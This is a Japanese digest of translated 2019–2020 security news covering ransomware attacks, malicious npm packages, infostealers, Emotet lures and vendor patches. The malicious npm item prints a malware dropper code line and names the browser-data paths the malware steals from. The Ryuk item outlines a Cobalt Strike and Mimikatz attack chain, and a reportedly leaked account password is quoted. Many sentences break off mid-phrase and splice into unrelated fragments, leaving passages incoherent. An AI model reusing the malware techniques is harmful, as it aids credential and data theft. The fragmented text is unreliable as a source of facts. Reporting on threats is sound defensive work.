 Mazeサイバー犯罪グループは、身代金要求型マルウェア・ビジネスの大立者の一つであった。11月1日、この悪漢共は凡そ1年半前(2019年5月)に開始した彼らの
作戦を終了 した。
 彼らは、今日殆どの身代金要求型マルウェア攻撃作戦が採用している二重恐喝(暗号化する前にデータを盗み、被害者が身代金を支払わない限りファイルを漏洩させると恐喝する)の原因となる行動をしたものである。
 Mazeの犠牲者の中には、
Allied Universal (米国を拠点とする米国のセキュリティ施設サービス会社)、
Southwire (米国のワイヤー、ケーブル、ツール、コンポーネント、および組み立てソリューションのメーカー)、
City of Pensacola (フロリダ州ペンサコーラ市)、
Canon (米国キャノン)、
LG Electronics (LGエレクトロニクス)、
Xerox (ゼロックス)などの重要な企業が含まれている。
韓国の小売大手E-Landは、身代金要求型マルウェアでの攻撃により店舗の臨時休業を余儀なくされている 
 BleepingComputer : News>Security(2020/11/22) 
 韓国の複合企業であり小売大手のE-Landは、身代金要求型マルウェアによる攻撃を受け、この攻撃を処理する間、23の小売店舗の臨時休業を余儀なくされている。
 E-Landは、主としてアパレルを中心とする60の小売ブランドを所有し、5000のフランチャイズ店舗で販売している。更に、E-Landは、韓国内でホテルやレストランも所有し運営している。
 韓国メディアの
聯合ニュース によると、E-Landは、週末に身代金要求型マルウェア攻撃を受け、ノースカロライナ州の50のデパートの内の23とNewCore Outlet(韓国のアウトレットモール)小売店舗の臨時休業に追い込まれた。
 本日、Chang-Hyun Seok(E-Land RetailのCEO)は、サイバー攻撃を認め、この身代金要求型マルウェアが、11月22日の朝にE-Landの本社に配備されたと述べている。
 この身代金要求型マルウェアの拡散を防ぐために、E-LandはITシステムの一部をシャットダウンしたので、一部小売店舗に影響を与えることになった。
 この際、被害の拡大を防ぐためにサーバのシャットダウンを集中的に行ったので、一部の小売店舗の営業が中断された」と、Seokはステートメントで謝罪している。
 Seokは、顧客と他の重要なデータは、別のサーバ上で暗号化されているので安全であると発言している。
 この攻撃を指揮する身代金要求型マルウェアの作戦によっては、暗号化されていないファイルとデータが盗すまれた可能性がある。暗号化されていないファイルを盗み 、支払いを拒否すれば、それらを公開するという脅しが増加している。身代金要求型マルウェアのデータリークサイト に公開される。
クレデンシャル・スタッフィング攻撃で30万を超えるSpotifyアカウントがハックされていた  BleepingComputer : News>Security(2020/11/22) 
 3億8000万レコードを超えるデータベース(ログイン資格情報を含む)が、Spotifyアカウントをハッキングするために積極的に使用されている方法の詳細に関する新しいレポートは、これらのアカウント・ブリーチ(【訳注】 ブリーチとは攻撃者が脆弱性を通じてサーバーにアクセスすること)に何らかの光を当てるかもしれない。
Spotifyアカウントをハッキングするためのユーザ情報を含む3億レコード 
 アカウントをハッキングするために使用される一般的な攻撃は、クレデンシャル・スタッフィング攻撃と呼ばれる。これは、脅威のアクターが、以前のセキュリティ・ブリーチで漏洩した多大なユーザ名とパスワードの組み合わせのコレクションを使用して、他のオンラインプラットフォームのユーザアカウントへのアクセスを獲得しようとするものである。
 3億ものレコードが収集された方法は分かっていないが、おそらく、データ漏洩 や一般的に無料で脅威のアクターがリリースした 資格情報の多大な「コレクション 」を介してではないかと思われる。この研究者達は述べている 。アカウントを要求している 間でさえ、アカウントのセキュリティを大きく増加させるマルチファクタ認証 (【訳注】 別名、二段階認証)をサポートしていない。
ハッカーは49000を超えるFortinet VPNの脆弱性攻撃プログラムを投稿した  BleepingComputer : News>Security(2020/11/22) 
研究者は数千のターゲットを発見している 
 ここで参照されている脆弱性はCVE-2018-13379である。この脆弱性は、多大な数の未パッチのFortinet FortiOS SSL VPNデバイスに影響を与えるパス・トラバーサル(【訳注】 利用者が供給した入力ファイル名のセキュリティ検証/無害化が不十分であるため、ファイルAPIに対して「親ディレクトリへの横断 (traverse)」を示すような文字がすり抜けて渡されてしまうような攻撃手法(Wikipediaより)) フローである。ネットワークを改竄し、身代金要求型マルウェアを配備するため に使用することができる。一年以上前 に公開されたが、この研究者は、未だに攻撃者によってターゲットにされることのできる約50,000のターゲットに注目している。Bank_Security は、脅威のアクターが、49,577にも及ぶ脆弱性攻撃可能なターゲットのデバイス リストを共有するスレッドをハッカーフォーラムで発見した。
 リスト解析後、この脆弱性のターゲットにされているのが、世界中の政府ドメイン、著名な銀行および金融企業に属しているドメインであることが発見された。
銀行、金融、政府組織が脆弱 
 BleepingComputerによる観測では、50,000ドメインの内、四ダースを超えるドメインが著名な銀行、金融、政府組織に属しているものであった。
 Bank SecurityがBleepingComputerに告げたところによると、フォーラムの投稿を確認した後、全ての組織が影響を受けるか否かを同定するためにIPのリストの解析を開始している。US government elections support systems に侵入するために攻撃者によって悪用された。
WordPress Webサイト中のRCEバグは広範なスキャンの対象になっている  ThreatPost : Blog (2020/11/18) 基盤を提供するもの である。最近、このフレームワークにパッチされた複数のセキュリティバグは、リモートコード実行(RCE)とサイトの乗っ取りを可能にするために繋げることができたと、研究者は発言している。Shapely , NewsMag , Activello , 他の12のテーマ)に、脆弱性のあるバージョンが出回ることになったと、この企業は火曜日のブログ で詳細に述べている。プラグイン とソフトウェアを最新の状態に保ち、パッチを適用することから始めることである」と、CTOでありK2 CyberSecurityの共同創設者であるJayant Shuklaは、E-Mailで述べている。
Egregor身代金要求型マルウェア攻撃は、脅迫文を犠牲者のプリンタで印刷する  BleepingComputer : News>Security(2020/11/18) Egregorが小売大手のCencosudを攻撃した 先週末に初めて動作した。
 脅迫文を印刷しているビデオへのリンク 
 拡大された印刷物に見られるように、これはレシート プリンターに印刷されているものであり、コンピューターで作成されたものと同じ脅迫文である。
 BleepingComputerは、この身代金要求型マルウェアの実行ファイルが、脅迫文の印刷を実行しているわけではないことを確認している。
新しいJupyterマルウェアがブラウザデータを盗み、バックドアを開いている  BleepingComputer : News>Security(2020/11/13) 
インストーラは6ヶ月間検出を回避していた 
 このマルウェアの亜種は、米国の大学における10月の重大事案対応の取り組みの間に出現した。しかし、犯罪科学データは、5月以降には、以前のバージョンが開発されていたことを示唆していた。
 このインストーラは、コマンド&コントロールサーバのクライアントとして振る舞う.NETローダのプロセスをメモリ中に挿入するためにプロセスの空洞化(【訳注】 explorer.exe や svchost.exe などの信頼できるアプリケーションを、悪意のあるコードのコンテナとして機能させる目的のためだけにシステムに読み込む手法(Sophosエクスプロイト解説より))テクニックを利用している。説明している 。
・ The-Electoral-Process-Worksheet-Key.exe
本物の囮、侵入テストツールキット 
 このインストーラは、二つのPowerShellスクリプト(一方で暗号化、もう一方で復号)をバックグラウンドにドロップする間に、迂回路を作成するためにDocx2Rtf、Magix Photo Managerのような正当なツールを実行する。PoshC2 フレームワークに依存し、ショートカットLINKファイル作成し、それをスタートアップフォルダに配置することで、そのマシン上に永続性を確立する。
 Morphisecのレポートは、コンポーネントの進化の追跡、それらの内部動作を明らかにするためにJupyter攻撃で使用されるツールとスクリプトに関する技術的詳細を記している。改竄の痕跡も記されている。
ロシア語のリンク 
 この研究者達は、C&C Jupyterサーバの多くがロシアに置かれていると発言している。それらの大多数は現在稼働していない。
 このInfostealerの絶え間ない開発は、このマルウェアがノーマークで在り続けるために、新しい要素を追加して変化している。この開発者達は、標的にする情報範囲を拡大している。
新しいCPUセキュリティバグを修正するWindows 10 Intelマイクロコードがリリースされた  BleepingComputer : News>Security(2020/11/09) Platypus攻撃 を使用する方法を示したビデオをリリースしている。
PLATYPUS - Attacking AES-NI with RAPLのビデオ 
リリースされたWindows 10 Intelマイクロコード アップデート 
 本日、Microsoftは、新しいIntelマイクロコード アップデートをリリースした。これはIntel CPU中のPlatypusを含む最新の脆弱性を修正するものである。
 このIntelマイクロコードでは、Intelから最新の修正を受け取る四つのCPUファミリーを追加している。
・ Avoton
 あなたのデバイスが上記のプロセッサのどれかを使用しているのであれば、関連するIntelマイクロコード アップデートがWindows Updateを介して提供されるだろう。
・ KB4589212 : Windows 10 2004と20H2、Windows Server 2004と20H2用のIntelマイクロコード アップデートKB4589211 : Windows 10 1903と1909、Windows Server 1903と1909用のIntelマイクロコード アップデートKB4589208 : Windows 10 1809、Windows Server 2019用のIntelマイクロコード アップデートKB4589206 : Windows 10 1803用のIntelマイクロコード アップデートKB4589210 : Windows 10 1607、Windows Server 2016用のIntelマイクロコード アップデートKB4589198 : Windows 10 1507用のIntelマイクロコード アップデート
 我々は、ユーザが新しいマイクロコード アップデートをインストールすることを推奨するが、今までのアップデートが最新ではないCPUでパフォーマンス問題 を発生させたことや、過去にバグと脆弱性を緩和する方法に起因してシステムをハング させたことには留意しなければならない。
サポートされるCPUか否かをチェックするには 
 あなたのコンピュータにどのCPUが実装されているのかをチェックするには、Windows 10デバイスマ ネージャを使用する。
 プロセッサ ファミリ、ステッピング情報(【訳注】 CPUの仕様変更のこと(富士通FMVサポートより))、リビジョン、型番を含むコンピュータのCPUに関してより学習したいのであれば、CPU-Zをダウンロード しなさい。
 例えば、デバイス マネージャとCPU-Z中に表示される情報から、あなたはインストールされているプロセッサが、Intel i7-8700k Coffee Lakeであることを確認することができる。
悪意あるNPMプロジェクトはDiscordアカウントとブラウザ情報を盗んでいる  BleepingComputer : News>Security(2020/11/09) 
悪意あるNPMはブラウザデータ、Discordトークンを盗んでいる 
 2020年10月25日、NPMはDiscordトークンと、Google Chrome, Brave Browser, Opera, Yandex Browserからブラウザ情報を盗むために設計されていた"fallguys"と呼ばれる悪意あるパッケージを削除した 。別の悪意あるモジュールを発見した 。これは、fallguysモジュールの後継と考えられている。ブランドジャッキング のパッケージは、既存のプランドの価値を利用し、ユーザによる悪意のない間違いを利用しようとするものである」と、Sharmaは述べている。
 プロジェクトに使用されると、このモジュールは以下のフォルダ中のLevelDBデータベースからDiscordユーザ トークンとブラウザ情報を盗もうとする。
・ %LocalAppData%\Google\Chrome\User Data\Default 
 このパッケージで使用されているファイル名から、情報を盗むために使用される様々なコンポーネントを見ることができる。
 収集される情報は以下を含む。
・ Discord, Discord Public Test Build (PTB), Discord Canaryのユーザトークン 
 ユーザ情報の収集が終了すると、これらの情報は、DiscordのWebhookを介して攻撃者の制御下にあるDiscordチャンネルに送信される。“require('child_process').exec('dropper.exe');”
 残念ながら、これらのプログラムは発見されていないので、それらが何を実行するのかは未知である。
Ryuk身代金要求型マルウェアは、どのようにして一企業から3400万ドルを奪ったのか?  BleepingComputer : News>Security(2020/11/06) 
現金化 
 Ryukファイル暗号化マルウェアのネットワークへの進入を容易にするTrickbotボットネットから受け取るIDによるとグループ"One"として参照されるこの脅威のアクターは、ターゲットに到達すると悪辣になる。Vitali Kremez によると、Ryukグループ"one"の最近の犠牲者には、テクノロジ、ヘルスケア、エネルギ、金融サービス、政府部門が含まれている。記述された Check Pointのレポートでは、この悪漢共は、2020年の第三四半期において毎週平均20社を攻撃している。Universal Health Services (UHS) 、一流のIT企業Sopra Steria 、Seyfarth Shaw 法律事務所、オフィース家具のトップSteelcase 、並びにブルックリンとヴァーモントの病院 に属するネットワークが暗号化されたとレポートしている。
15ステップの攻撃チェーン 
 重大事案対応エンゲージメント(Incident Respose Engagement)からの攻撃のフローの解析で、Kremezは、Ryukグループ"one"が、ネットワーク上で利用可能なホスト名を発見し、管理者レベルの証明書を盗み、Ryuk身代金要求型マルウェアを配備するまで15ステップあまりがあると記している。
・ Mimikatz - メモリから証明書をダンプするためのポストエクスプロイト(【訳注】 攻撃者の侵入後の活動用) ツール 
 この攻撃チェーンは、現在のユーザが、Domain Admin(【訳注】 Domain Adminsはドメイン内の全てのコンピュータのAdministrators権限を持っている、言い換えるとドメイン内の全てのコンピュータの管理をする事ができる非常に強力な権限。通常はシステム管理者だけが、持っている権限(ITtripより))グループに属しているか否かのチェック用の"DACheck.ps1"スクリプトを実行するためにCobalt Strike(【訳注】 標的型攻撃を模倣することができる商用製品(JPCERTよ/CCり)) "invoke"コマンドを稼働することによって始まる。
 そこから、Mimikatzでパスワードが取得され、ネットワークがマップされ、ホストがFTP, SSH, SMB, RDP, VNCプロトコルに関するポートスキャンによって同定される。
1. "Invoke-DACheck"スクリプトでDomain Adminを検査する 
 Trickbotギャングは、少なくとも2020年4月から、スピアフィッシングキャンペーンを通じてBazarLoaderバックドアの拡散を開始している。多く検出されるTrickbotマルウェアとは異なり、このマルウェアは当初、このオペレータにリモートアクセスを提供するCobalt Strikeビーコンを配備するために、金銭的な価値の高い犠牲者用に取り置かれていたようである。より一般的になってきている 。
Windows 10 20H2は、LSASSクラッシュで強制再起動を発生させている  BleepingComputer : News>Security(2020/11/06) 
クライアント、サーバー両方のプラットフォームに影響を与える 
 「Windows 10 20H2にアップグレードした後、ユーザをリストするあらゆるダイアログ(例えば、サインインオプション設定アプリケーションページ、あるいはローカルユーザとグループMMC(Microsoft Management Console)スナップイン中のユーザフォルダへのアクセス)で操作している時に、"Your PC will automatically restart in one minute(PCは1分後に自動的に再起動されます)"のテキストと共にLSASS.exeのエラーを受け取る可能性がある」とMicrosoftは発言している。
利用可能な解決策 
 「この問題を防止し、セーフガードホールド(【訳注】 アップグレードするとトラブルになることが確認されているハードウェアやソフトウェアがインストールされている環境に対し、不具合の修正が完了するまでの間、アップデートの提供を一時的に停止(ブロック)する措置のこと(窓の杜より))を受け取らないようにするには、Windows 10バージョン2004やWindows 10バージョン20H2にアップデートする前に、全ての組み込みユーザの名前をDefault名に戻す必要がある」と、Microsoftは発言 している。ここで 利用できる指示を使用して以前のWindows 10に戻すことで、この問題を解決することができる。発言 している。
DISM /Online /Set-OSUninstallWindow /Value:[days]
 あなたは、このコマンドの引数として2から60の間を選択できる。2より小さく、60より大きな値を指定した場合は、アップグレード後、アンインストールを開始できる日数は、自動的に10日にセットされる。Blue Screen of Dethでクラッシュする という、2つ目の問題に関する追加の互換性保持を適用している。
カプコン(Capcom)がLocker身代金要求型マルウェアによって攻撃されている  Threatpost : Blog (2020/11/05) BleepingComputer によると、身代金要求型マルウェアRagnar Lockerが、このサイバー攻撃に使用された。身代金要求型マルウェアRagnar Lockerは、仮想マシンを介して身代金要求型マルウェアのペイロードを拡散することでよく知られている マルウェア株である。特にRagnar Lockerの背後にいる攻撃者は、4月のEnergias de Portugal (EDP)(【訳注】 ポルトガルを拠点とする電力事業者の通称)の北米ネットワーク攻撃のように、ネットワークを暗号化する前にデータを盗むことで知られている 。サイバー攻撃者は、10TBの重要な企業データを盗んだと主張しており、1,580 Bitcoin(約1100万ドル)の支払いを要求している。UbisoftとCrytek をターゲットにした。更に、Sodinokibi (REvil)身代金要求型マルウェアのオペレータは、伝えられているところによると、将来ビデオゲームの大企業をターゲットにした攻撃をすると約束した と報告されている。2020年では、これまでの流行 としては、身代金要求型マルウェア攻撃が全体として増加している。サイバー犯罪者は、病院 から米国大統領選挙の間の地方自治体 、大学 まで、あらゆるものを標的にしている。
VMwareは緊急のESXiフローの修正アップデートをリリースした  Security Week : Vulnerabilities(2020/11/04) 緊急の脆弱性 に関して先月リリースした修正を検証した後、ESXiに関する新しいパッチをリリースしたと顧客に通知した。アドバイザリ はまた、ZDIによって10月に公開された。当初のアドバイザリ を更新した。新しい修正は、ESXi 6.5, 6.7, 7.0としてリリースされたが、仮想マシンの管理とコンテナのオーケストレーションを行うためのハイブリッド クラウド プラットフォームであるVMware Cloud Foundation用のパッチは保留されたままである。パッチを数回実行 している。
デスクトップとAndroidの両方にリスクのあるChromeの0-Dayが攻撃されている  The Register : Security(2020/11/04) オープンソースJSとWebAssemblyエンジン であるV8中に存在している。この脆弱性の詳細は、この記事を記述している時点では、CVE-2020-16009のMITREエントリ (【訳注】 脆弱性の識別番号であるCVE-IDを管理している企業(McAfee Blogより))を介した公開ドメイン中には未だ存在していない。この脆弱性は、「リモード攻撃者が、巧みに細工されたHTMLページを介して、ヒープ損壊攻撃を可能にするものである。」
何者かが10億BitCoinあったWalletをスッカラカンにした  BleepingComputer : News>Security(2020/11/04) 
一日でBitCoinはWalletから引き出された 
 以下に示すように、このBitCoinのWallet(アドレス1HQ3Go3ggs8pFnXuHVHRytPCq5fGG8Hbhxで同定される)は、この投票日に巨大な取引をした。
 一晩で、このWalletの額は、不思議なことに、巨大な額が現金化された後、僅か1.38US$になった。
 この重大事案は、Hudson Rockの共同設立者でCTO(【訳注】 最高技術責任者)であるAlon Galによって報告された。Tweet している。
2015年以降Walletはハッカーの間で流通している 
 このWalletはハッカーとの関連付けにおいて取り分け興味を引いた。クラック に成功した者はいない。休眠状態 」であった。空にされた 。可能 である。そして、発生する恐れのあるマネー・ロンダリングのような不法行為は、金融および規制当局に対して明らかにされるだろう。
新しいRegretLocker身代金要求型マルウェアはWindows仮想マシンをターゲットにしている  BleepingComputer : News>Security(2020/11/03) 
 RegretLockerは、ファイルを暗号化している時、暗号化されたファイル名に無害に見えそうな .mouse 拡張子を追加する。
 この身代金要求型マルウェアは見かけに欠けているものの、以下に説明するように、通常、身代金要求型マルウェア感染には見られない高度な機能で補われている。
RegretLockerは仮想ハードディスクをマウントする 
 Windows Hyper-V仮想マシンを作成する時、仮想ハードディスクが作成され、VHDもしくはVHDXファイル中に格納される。MalwareHunterTeam によって発見され、Advanced IntelのVitali Kremez によるこの身代金要求型マルウェアのサンプルの解析で、RegretLockerは、仮想ディスクファイルをマウントし、そのファイルを個別に暗号化できる高度なテクニックを使用していた。OpenVirtualDisk , AttachVirtualDisk , GetVirtualDiskPhysicalPath 関数を使用して仮想ディスクをマウントしている。
 この身代金要求型マルウェアのデバッグ メッセージに表示されているように、VHDを具体的に検索し、検出されると、それらをマウントしている。
parse_files() | Found virtual drive: %ws in path: %s
 Windowsの物理ディスクのように仮想ドライブがマウントされると、この身代金要求型マルウェアは、夫々を個々に暗号化することができるので、暗号化のスピードを上げることができる。smelly__vx によって最近発表された研究 から取得されている。Windows Restart Manager API を利用している。
 Windows Restart Manager機能は、REvil (Sodinokibi) , Ryuk, Conti , ThunderX/Ako , Medusa Locker , SamSam , LockerGoga のような幾つかの身代金要求型マルウェアによって使用されているだけである。
Windowsカーネルの0-Dayの脆弱性が標的型攻撃に使用されていた  BleepingComputer : News>Security(2020/10/30) 
利用可能な脆弱性攻撃の脆弱性の証明 
 Project Zeroのセキュリティ研究者Mateusz JurczykとSergei Glazunovによると、Windowsカーネルの0-Dayのバグは、権限の昇格(サンドボックス保護メカニズムの回避を含む)に関して特定の攻撃者によって悪用されていた。この問題に関連するBen HawkesのTwitterへのリンク 
この攻撃はアメリカの選挙に関連していない 
 Ben Hawkes(GoogleのProject Zeroセキュリティチームの技術チームのリーダー)によると、オンライン上でCVE-2020-17087を悪用する現在実行されている攻撃は、アメリカの選挙を標的として関連付けられていない。発言している 。Project Zero issue tracker に追加されたが、オンライン上で既に攻撃者によって使用されているために7日後に公開された。積極的に攻撃されている0-Dayの脆弱性 を修正した。
トランプの公式キャンペーンサイトが「この大統領の十分な数のフェイクニュースを持っている」とするハッカーによって破壊された  The Register : Security(2020/10/28) Homeland Security (米国国土安全保障省)とNSA (米国国家安全保障局)による、より緊急度の高い勧告に従うことでもある。
 この汚されたドットコムは、人々から暗号通貨を収穫する策略として、大統領を信用しない証拠のリークに賛成なのか反対なのかで用意された二つの財布へMoneroデジタル通貨を寄付するようにネット市民に依頼していた。このページはまた、他の野蛮な主張の中に「複数のデバイスが、トランプと関係者へのフルアクセスを与えるように改竄された」とも主張している。告げている 。
Microsoft: WindowsからAdobe Flashを削除するアップデートをリリース  BleepingComputer : News>Security(2020/10/27) 
 このオプションの更新プログラムは、Microsoft Catalog を介してのみ利用可能であり、一旦インストールすると、後で削除することはできない。Microsoftは述べている 。けれども、我々のテストでは、このアップデートをインストールした後も、Adobe Flash Playerは、以下に示すように存在していた。
 Microsoft Edge上でAdobe Flashをチェックすると、このアップデートをインストールした後も、Adobe Flashはインストールされたままだった。このテストは、EdgeでFlashを有効にし、https://helpx.adobe.com/jp/flash-player.html(リンクを日本語サイトに変更) をチェックして行われた。
 BleepingComputerはMicrosoftに接触し、このアップデートが我々のテストでFlash Playerを削除しなかった理由を特定した。
現在Windows 10が非表示にしているSYSTEMコントロールパネルへのアクセス方法  BleepingComputer : News>Security(2020/10/25) Windows 10 20H2のリリース に伴い、Microsoftは現在、由緒あるSYSTEMコントロールパネルへのアクセスを妨げ、代わりに、新たにアップデートされた’About'設定ページにユーザをリダイレクトしている。
 7月にBleepingComputerは、Microsoftが全てではないもののSYSTEMページで発見される殆どの情報を含むように'About'設定ページをアップデートしたとレポート した。その時点で、MicrosoftはSYSTEMコントロールパネルを開こうとするとAboutページにユーザーをリダイレクトする機能をコッソリ試していた。
 Windows 10 20H2で、Microsoftはコントロールパネルを破滅に導き、現在、ユーザがSYSTEMコントロールパネルにアクセスすることを妨げている。現在、ユーザがSYSTEMコントロールパネルを開こうとすると、Aboutページが表示される。最新のディスクマネージメント ツール 、リフレッシュレート オプション のテストと、'Program and Features'(プログラムと機能)コントロールパネルを'Apps & Features'(アプリケーションと機能)にリダイレクト するテストで、我々は、Microsoftが徐々にコントロールパネルを削除していることを確認した。
Windows 10 20H2でSYSTEMにアクセスする方法 
 MicrosoftはSYSTEMコントロールパネルをリダイレクトしているが、特別に細工されたWindowsショートカットでアクセスする方法がある。
1/ 開いている全てのアプリケーションとフォルダを最小化して、Windowsデスクトップだけが表示されている状態にする。
2/ デスクトップを右クリックし、新規作成 > ショートカット を選択する
3/ ショートカット ダイアログが開いたら、ショートカットのフィールドに
explorer shell:::{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}  をコピー・アンド・ペーストする。次にNextボタンを押す。
4/ これで、このショートカットに名前を付けるページが表示される。名前を付ける欄にSYSTEMと入力し、Finishボタンを押す。
5/ SYSTEMと名付けられたショートカットが、デスクトップに作成されている。SYSTEMコントロールパネルを開くときには使用することができる。
 このSYSTEMショートカットは、スタートメニューで'SYSTEM'を検索し、アプリケーションセクションに表示されたアイコンを選択することで、直接起動することも可能である。
EmotetマルウェアはMicrosoft Wordをアップグレードするよう呼びかけている  BleepingComputer : News>Security(2020/10/24) 
 Emotetは、今週Microsoft Officeからのメッセージを装う新しいテンプレートに変更した。これには、新しい機能を追加するためにMicrosoft Wordをアップグレードする必要があると述べられている。身代金要求型マルウェア(ランサムウェア)攻撃を導く ことができる。
新しい悪意あるドキュメントテンプレート 
 Emotetは、受信者を欺き添付ファイルを開かせるために様々な誘惑(以下に示すように、請求書、出荷通知、履歴書、注文書、さらにはCOVID-19(【訳注】 新型コロナウィルス)情報を装う)を使用している。
 これらのスパムメールに添付されているファイルは、悪意あるWord(.doc)、もしくは、そのファイルをダウンロードさせるためのリンクである。
・ Upgrade your edition of Microsoft Word(Microsoft Wordをアップグレードしなさい)Enable Editing  and then click Enable Content .(文書内の編集を有効にする をクリックし、次に、コンテンツの有効化 をクリックして下さい)
 このドキュメントは、Microsoft Wordをアップグレードするために、Enable Editing(文書内の編集を有効にする)とEnable Content(コンテンツの有効化)ボタンをクリックするように、ユーザに告げている。これは、悪意あるマクロを実行させることになる。
 これらの悪意あるマクロは、以下に示すように、Emotetマルウェアを犠牲者の%LocalAppData%フォルダ(【訳注】 この環境変数は、C:\Users\ユーザー名\AppData\Local を指しています)にダウンロードする
何故Emotetの添付ファイルを認識する必要があるのか? 
 Emotetは今日、ユーザを標的にしている最も広範に拡散している マルウェアであると認識されている。このマルウェアは、犠牲者のコンピュータ上にTrickbotやQBotのような他の感染体をインストールするのでとりわけ危険である。Conti(TrickBot) やProLock(QBot) 身代金要求型マルウェアの攻撃を導く。
ハッカーによると、ドナルド・トランプのTwitterパスワードは”maga2020!”であり、二要素認証は使われていなかった  Graham Cluley : News (2020/10/23) ドナルド・トランプのパスワードをクラックしていた という驚くべき主張をした。yourfired ”であった。maga2020! ”で保護されており、二要素認証は無効になっていた。
・ !IWillAmericaGreatAgain! 
 Geversは、彼がドナルド・トランプのプロファイルに対して完全なアクセスを持ったことを示すために、そのスクリーンショットを共有した。Vrij Nederlandからのレポート を読みなさい。
Chrome、0-Dayの脆弱性を修正。直ちにアップデートを  Sophos : NakedSecurity (2020/10/22) 安定版 」である。保留中の更新 があることを示している。Chromeのオープンソースバージョン )ユーザは、通常のアップデート手順に従いなさい。アップデートの手順は、あなたが使用しているオペレーティングシステムと、最初にChromiumを取得した場所に依存する。
何をすべきか? 
 アップデートしよう!
Windows 10 KB4579311アップデートは、インストールされず、Explorerのクラッシュを引き起こす  BleepingComputer : News>Security(2020/10/20) KB4579311累積アップデート を、2020年10月13日にリリースした。それ以来、ユーザは、このアップデートでインストール、クラッシュ、パフォーマンスに関する問題とブート問題が起きていると報告し続けている。
ユーザが報告していること 
 KB4579311累積アップデートのリリースで、ユーザが経験した問題の数に顕著な増加がある。
KB4579311累積アップデートをインストールできない 
 ユーザがWindows 10 KB4579311累積アップデートで遭遇する最も一般的な問題は、そもそも、このアップデートをインストールすることができないということである。Microsoftのフォーラムへの投稿 は、ユーザが、このアップデートをインストールしようとした時、0x800f081f, 0x8007000d, 0x800f0988他のようなエラーコードを受け取ったと多くのユーザは通知している。
Feedback Hubのレポート(画像をクリックすると拡大します)
 Reddit の他のユーザもまた、インストレーションルーチンがあるパーセンテージに達すると、動かなくなると通知している。結局長い間待たされた後に、このアップデートは続行される。Windows 10 Media Creation Toolを使用するインプレース アップグレード を実行することである。(【訳注】 過去、Media Creation Toolを使用してのインプレースアップグレードは多大な時間がかかることが報告されています。ただ、累積アップデートがリリースされる度にMedia Creation Toolもアップデートされますので、この累積アップデートでトラブルに遭遇した方は、一度お試し下さい)
ブート問題、Explorerのクラッシュ、パフォーマンスの問題 
 最後に、一部のユーザは、ブート問題、パフォーマンス問題、奇妙なデスクトップ問題を経験している。自動的に解決されず 、代わりに、Windowsが応答しなくなる。
1. KB4579311アップデートをアンインストールする。ここで アップデートのアンインストールについて詳細に学習することができる。現在、例外なくインストール することができる。 
気をつけろ! このAndroidマルウェアは工場出荷状態に戻しても削除することができない  Fossbytes : News(2019/10/30) 
アプリケーションのサイドローディングを可能にしているWebサイトによって拡散している 
 Symantecは、このAndroidマルウェアが、ユーザのデバイス上のアプリケーションをサイドロード(【訳注】 新しいデバイスでサポートされなくなってしまったアプリをインストールしたい場合、Google Play経由ではなくPCからマニュアル操作でアプリをデバイスにインストールする方法(lifehackerより))することを可能にしているWebサイトによって押し付けられると明らかにしている。ユーザがサードパーティのWebサイトからアプリケーションをインストールすると、xHelperトロイは、ターゲットのスマートフォンにインストールされる。
工場出荷状態に戻しても削除できない 
 このマルウェアの最も興味をそそることの一つは、その背後にいる悪の行動主体が、スマートフォンからこのマルウェアを削除することが不可能に近いことを保証していることである。このマルウェアは、暗号化を使用して自分自身を難読化している。Malwarebytesによると、xHelperアプリケーションには、セミステルスとフルステルスの二つの変種がある。両方の変種共、アプリケーションアイコンを作成しない。これは通常のユーザが発見することをより困難にしている。アイコンやショートカットがないことは、あなたが、この頻繁に通知を発生させるアプリケーションをアンインストールできないことを意味している。
 xHelperは、デバイスの起動。ネットワーク接続のような特定のアクションが呼び出された時に自動的に稼働するようにコーディングされている。一旦、フォアグラウンドサービス(【訳注】 通常のサービスと違い、通知を表示し、バックグラウンドで実行している事をユーザに認識させた状態で実行するもの(Qiitaより))として処理が開始されると、このマルウェアは、xHelperトロイを抱き合わせていたアプリケーションを削除しても、このマルウェアを削除することはできない。
サイドローディング・アプリケーションを回避せよ 
 このマルウェアがデバイスに感染すると削除する方法が存在していないので、アプリケーションのサイドローディングを許可しているWebサイトを回避することが適切である。また、インターネットの閲覧中にリダイレクトされるリンクに注意しなさい。デバイスを安全に保つために、怪しいポップアップをクリックしないようにしなさい。
Yatron, WannaCryFake, FortuneCrypt身代金要求型マルウェア用の復号プログラムがリリースされた  BleepingComputer : News>Security(2019/09/25) 
EmsisoftがWannaCryFakeの復号プログラムをリリースした 
 Emsisoftは、WannaCry Fake身代金要求型マルウェア用の復号プログラムをリリース した。この身代金要求型マルウェアは、暗号化したファイルに .wannacry 拡張子を付けることによって悪名高いWannaCryに便乗しようとした。
 「WannaCryFakeは、犠牲者のファイルの暗号化にAES-256を使用する身代金要求型マルウェア株である。WannaCryFakeによって暗号化されたファイルは、ファイル拡張子 “.[][recoverydata54@protonmail.com].WannaCry” を付けられる」
 感染させられたユーザは、以下のような脅迫文を見ることになる。
WannaCryFakeの脅迫文(画像をクリックすると拡大します)
 あなたが、この身代金要求型マルウェアによって暗号化されたのであれば、この復号プログラムをダウンロード し、ファイルを無料で復号することができる。
KasperskyがYatronとFortuneCrypt用の復号プログラムをリリースした 
 Kasperskyは本日、YatronとFortuneCrypt身代金要求型マルウェアの復号プログラム(暗号化アルゴリズムの弱点を利用)をリリース した。宣伝を始めた時 に取り上げている。この身代金要求型マルウェアに感染した者は、暗号化ファイルに .Yatron拡張子を付けられている。
Yatronで暗号化されたファイル(画像をクリックすると拡大します)
 この身代金要求型マルウェアはHiddenTear(暗号化に弱点があることが知られている)を元にしているので、Kasperskyは、それ用の復号プログラムを作成できると宣言していた。Kasperskyによると、この身代金要求型マルウェアの殆どの犠牲者は、ドイツ、中国、ロシア連邦、インド、ミャンマーである。
 「この身代金要求型マルウェアの作者は、上述した最初のシナリオを選択し、オープンソースの身代金要求型マルウェアのサンプルとして著名なHiddenTearで使用されているコードの『創作物』に基づいている。我々の統計によると、昨年だけでも、ドイツ、中国、ロシア連邦、インド、ミャンマーで記録された、Trojan-Ransom.MSIL.Tearの様々な変種による600を超える感染を防御した。」
 Kasperskyはまた、大部分がロシア連邦、ブラジル、ドイツ、韓国、イランを標的にしたFortuneCrypt身代金要求型マルウェア用の復号プログラムをリリースした。
 「昨年の間、我々の製品は、悪意あるTrojan-Ransom.Win32.Cryprenファミリー(FortuneCryptは、このファミリーの一つである)の多くの変種によって実行された6000を超える攻撃を記録した。このマルウェアによって攻撃されたトップ5の国々は、ロシア連邦、ブラジル、ドイツ、韓国、イランである。」
